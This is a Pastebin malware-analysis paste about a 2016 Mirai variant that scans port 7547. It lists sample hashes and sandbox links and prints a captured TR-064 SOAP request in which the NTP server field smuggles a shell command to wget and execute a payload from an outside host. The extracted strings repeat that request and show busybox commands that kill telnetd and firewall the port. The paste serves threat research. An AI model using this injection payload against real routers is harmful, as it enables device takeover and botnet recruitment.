API tools faq
paste
Advertisement
Dead_Cat

New #Mirai scanning port 7547/TCP #IoT

Dead_Cat
Nov 27th, 2016
2,716
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
XML 4.09 KB | None | 0 0
raw download clone embed print report
  1. New #Mirai scanning port 7547/TCP #IoT
  2.  
  3. VT:
  4. https://www.virustotal.com/en/file/ff47ff97021c27c058bbbdc9d327b9926e02e48145a4c6ea2abfdb036d992557/analysis/
  5. https://www.virustotal.com/en/file/5fc86972492cd901ea89bd86fbdebd307c3f1d2afa50db955a9594da000d0b38/analysis/
  6. https://www.virustotal.com/en/file/ace9c1fe40f308a2871114da0d0d2f46965add1bda9c4bad62de5320b77e8a73/analysis/
  7. https://www.virustotal.com/en/file/8537f9de4ea6662c22b631c90d647b79e448026327e572b90ec4d1a9f2aa2a50/analysis/
  8. https://www.virustotal.com/en/file/97dd9e460f3946eb0b89ae81a0c3890f529ed47f8bd9fd00f161cde2b5903184/analysis/
  9. https://www.virustotal.com/en/file/2548d997fcc8f32e2aa9605e730af81dc18a03b2108971147f0d305b845eb03f/analysis/
  10.  
  11. detux sandbox
  12. https://detux.org/report.php?sha256=ff47ff97021c27c058bbbdc9d327b9926e02e48145a4c6ea2abfdb036d992557
  13. https://detux.org/report.php?sha256=ace9c1fe40f308a2871114da0d0d2f46965add1bda9c4bad62de5320b77e8a73
  14.  
  15.  
  16.  
  17.  
  18. TCP Raw Streams
  19. [172.16.1.32:57982 --> 45.16.159.12:7547]
  20.  
  21. POST /UD/act?1 HTTP/1.1
  22. Host: 127.0.0.1:7547
  23. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
  24. SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
  25. Content-Type: text/xml
  26. Content-Length: 526
  27.  
  28. <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body>  <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">   <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/1;chmod 777 1;./1`</NewNTPServer1>   <NewNTPServer2></NewNTPServer2>   <NewNTPServer3></NewNTPServer3>   <NewNTPServer4></NewNTPServer4>   <NewNTPServer5></NewNTPServer5>  </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>
  29.  
  30.  
  31. strings:
  32.  
  33. POST /
  34.  HTTP/1.1
  35. Myname--is:
  36. Host:
  37. Cookie:
  38. http
  39. url=
  40. POST
  41. /proc/net/tcp
  42. busybox killall -9 telnetd
  43. busybox iptables -A INPUT -p tcp --destination-port 7547 -j DROP
  44. %d.%d.%d.%d
  45. sigaction
  46. POST /UD/act?1 HTTP/1.1
  47. Host: 127.0.0.1:7547
  48. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
  49. SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
  50. Content-Type: text/xml
  51. Content-Length: 526
  52. <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body>  <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">   <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/1;chmod 777 1;./1`</NewNTPServer1>   <NewNTPServer2></NewNTPServer2>   <NewNTPServer3></NewNTPServer3>   <NewNTPServer4></NewNTPServer4>   <NewNTPServer5></NewNTPServer5>  </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>
  53. POST /UD/act?1 HTTP/1.1
  54. Host: 127.0.0.1:7547
  55. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
  56. SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
  57. Content-Type: text/xml
  58. Content-Length: 526
  59. <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body>  <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">   <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2`</NewNTPServer1>   <NewNTPServer2></NewNTPServer2>   <NewNTPServer3></NewNTPServer3>   <NewNTPServer4></NewNTPServer4>   <NewNTPServer5></NewNTPServer5>  </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>
  60. POST /UD/act?1 HTTP/1.1
  61. Host: 127.0.0.1:7547
  62. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
  63. SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
  64. Content-Type: text/xml
  65. Content-Length: 526
  66. <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body>  <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">   <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/3;chmod 777 3;./3`</NewNTPServer1>   <NewNTPServer2></NewNTPServer2>   <NewNTPServer3></NewNTPServer3>   <NewNTPServer4></NewNTPServer4>   <NewNTPServer5></NewNTPServer5>  </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!